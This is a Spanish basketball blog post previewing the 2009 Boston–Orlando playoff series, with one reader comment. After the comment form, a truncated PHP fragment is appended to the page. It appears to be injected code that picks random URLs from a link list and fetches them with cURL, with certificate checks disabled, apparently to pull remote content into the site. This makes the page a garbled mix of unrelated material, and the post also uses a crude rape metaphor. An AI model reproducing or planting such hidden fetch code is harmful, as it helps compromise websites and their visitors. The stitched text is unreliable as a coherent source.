Análisis Playoffs 2009: Boston – Orlando

04 de May de 2009 por TheDeerHunter

¡¡Tópicos van!!!!: “La cosa va en serio. Sólo les vale ganar. Dos titanes frente a frente. Final anticipada. Se presenta una eliminatoria de lo más igualada…” Podéis aplicar cualquiera de ellos y los demás asentirán con la cabeza.

No llegan a uno de los puntos decisivos de la temporada en su mejor momento de ninguno de los dos equipos y, sin embargo, ambos llegan fortalecidos tras la primera ronda. Los Celtics han superado el primer escollo tras la pérdida de Garnett y Powe y vienen entrenados para cualquier incidencia. Orlando ha recuperado efectivos y eliminaron a los Sixers de forma algo más fácil de lo esperado. Ambos echarán en falta las bajas aunque ninguno pensará en ellas en el momento de la verdad.

Se antoja un duelo interior vs exterior. Ninguno de los dos equipos tiene el especialista idóneo para defender a las grandes individualidades contrarias y sin embargo cuentan con sistemas defensivos colectivos dignos de tener en cuenta. Ambos tienen tendencia al tiro exterior. Un duelo interesantísimo.

2-2 en la fase regular, por cierto.

Claves de la eliminatoria

– (Tópico viene!!!) Kriptonita contra Superman: Rivers ha demostrado conocer el secreto de cómo minimizar a Dwight Howard pero ¿podrá implementarlo con, únicamente, Perkins y Davis dentro? Si ya pasaron problemas contra el juego interior de los Bulls que no son precisamente ningún superhombre pueden sufrir las de Caín. No nos extrañemos nada si los Celtics vuelven a hacer aquello del small-ball. Al fin y al cabo, Lewis tampoco es el gordo Barkley…

Defensa exterior al “Big Three” de los Celtics. Redick ha declarado que quiere hacerse un nombre en la NBA a partir de estos playoffs. Esperemos por su bien que no sea el de “El tipo que fue violado en público y con ensañamiento por Ray Allen”

Contraataques frente a penetraciones. Todos sabemos que Rondo no es un tirador excelso. No es lo mismo penetrar frente a Noah que hacerlo frente a Goliath. Los Celtics son un equipo mucho más rápido que Orlando así que seguro que tratarán de evitar el estático todo lo que puedan. Alston no se caracteriza por arriesgar demasiados balones.

Físico vs Moral. Los Celtics llevan una tralla física tremenda pero en cierto modo les tienen comidita la moral a los de Van Gundi. El primer partido en Boston valdrá mucho más que el resto.

Pronóstico: 4-3 para los Campeones.

Comenta

Un comentario a esta entrada

  1. Jabho dice:
    #1

    Pues si la Boston consigue ganar uno de los 2 próximos en Orlando si creo que los Celtics pasen en 6 o 7… La duda es si con lo trillados que vienen serán capaces de ganar uno en Orlando.

    De momento la defensa de Perkins sobre Howard está siendo buena… que dure.

    Y a Marbury se le están empezando a ver cositas y por actitud nada que echarle en cara, por ahora. Igual da algún susto en PO a algún equipo si sigue cogiendo forma.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>